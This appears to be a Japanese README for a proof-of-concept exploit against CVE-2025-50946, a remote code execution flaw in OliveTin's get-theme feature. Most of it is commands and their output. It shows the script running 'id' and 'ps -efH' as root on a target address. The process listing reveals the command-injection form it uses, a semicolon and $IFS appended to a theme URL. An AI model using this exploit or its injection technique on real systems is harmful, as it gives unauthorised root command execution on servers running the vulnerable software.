
CVE-2025-50946 用のエクスプロイトスクリプト
CVE-2025-50946(OliveTin get-theme RCE)用のエクスプロイトスクリプトです。文字の要件が非常に厳しく、複数の引数を含む多くのコマンドは正しく実行されない可能性があります。根本原因の調査やスクリプトの堅牢化にはまだ時間をかけていません。必要な場合はご連絡いただくか、PRを開いてください。
このスクリプトの基となったオリジナルの調査は chrisWalker11 によるものです: リンク
基本PoC:
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload...
uid=0(root) gid=0(root) groups=0(root)
プロセス一覧(出力の一部のみ表示):
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload...
UID PID PPID C STIME TTY TIME CMD
root 2 0 0 09:20 ? 00:00:00 [kthreadd]
root 1 0 0 09:20 ? 00:00:01 /sbin/init
root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P
root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin
root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH
root 2168 2167 0 13:26 ? 00:00:00 ps -efH